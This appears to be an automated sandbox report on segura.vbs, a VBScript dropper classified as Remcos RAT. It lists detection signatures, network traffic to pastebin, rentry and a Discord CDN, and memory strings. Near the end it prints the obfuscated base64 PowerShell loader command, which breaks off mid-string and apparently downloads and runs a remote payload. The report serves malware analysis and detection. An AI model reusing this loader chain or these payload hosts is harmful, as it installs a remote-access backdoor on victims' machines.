Windows Analysis Report
segura.vbs

Overview

General Information

Sample name: segura.vbs
Analysis ID: 1545854
MD5: 5fa27882d49b1bcf021faca879f41ecb
SHA1: bba7da6693438f19e241ccc82627227f74e53d3c
SHA256: bef0af387fe44cd78c261d4374ca93e940ed0ef55e7055d4a9fd5246a4913768
Tags: vbsuser-lontze7
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected MSILDownloaderGeneric
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.6% probability
Source: powershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_c062632a-0

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
Source: unknown HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49756 version: TLS 1.2

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 00007FFD342CAD43h 4_2_00007FFD342CACD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 00007FFD342CD896h 4_2_00007FFD342CD7F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ecx, 00000C00h 4_2_00007FFD3439243D

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 162.159.135.233:443 -> 192.168.2.6:49756
Source: Network traffic Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 162.159.135.233:443 -> 192.168.2.6:49756
Yara detected MSILDownloaderGeneric
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Yara detected Generic Downloader
Source: Yara match File source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /raw/4B83LcVU HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /shqm6g9p/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a&is=672230ea&hm=1e5ddde8edfd2b0b55a1936b9b2cf98999ca75e818b8e4dadd7bc75ebedbbd24& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View IP Address: 164.132.58.105 164.132.58.105
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /raw/J6uRjZrv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vsm4ofxs/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /raw/J6uRjZrv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vsm4ofxs/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/4B83LcVU HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /shqm6g9p/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a&is=672230ea&hm=1e5ddde8edfd2b0b55a1936b9b2cf98999ca75e818b8e4dadd7bc75ebedbbd24& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: pastebin.com
Source: global traffic DNS traffic detected: DNS query: rentry.org
Source: global traffic DNS traffic detected: DNS query: cdn.discordapp.com
Source: powershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/1187381098527858721/1299360122446807113/ESTE2.TXT?EX=6723826A
Source: powershell.exe, 00000004.00000002.2309229890.00000230519B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cdn.discordapp.com
Source: powershell.exe, 00000002.00000002.2385225983.00000283519AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mS%F-sE
Source: powershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D019C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D1007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2309229890.000002305309D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.0000023052A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D01949000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rentry.org
Source: powershell.exe, 00000002.00000002.2387245646.0000028351BD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230513F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2373219888.0000023069B0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000002.00000002.2387245646.0000028351B8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2387245646.0000028351BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230513F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com
Source: powershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a
Source: powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2309229890.000002305242C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D01471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2373219888.0000023069AD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.coa
Source: powershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D019C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D1007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2309229890.000002305304C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230517B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.2309229890.000002305304C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw
Source: powershell.exe, 00000004.00000002.2309229890.000002305304C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230517B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/4B83LcVU
Source: powershell.exe, 00000004.00000002.2307658874.000002304F938000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/J6uRjZrv
Source: powershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.000002305196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D016B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org
Source: powershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.000002305196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230530E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org/shqm6g9p/raw
Source: powershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org/shqm6g9p/rawP
Source: powershell.exe, 00000007.00000002.2217928363.0000020D01471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D016B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D00C2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org/vsm4ofxs/raw
Source: powershell.exe, 00000007.00000002.2217928363.0000020D01471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org/vsm4ofxs/rawp
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49756 version: TLS 1.2
Yara detected Keylogger Generic
Source: Yara match File source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4952, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?G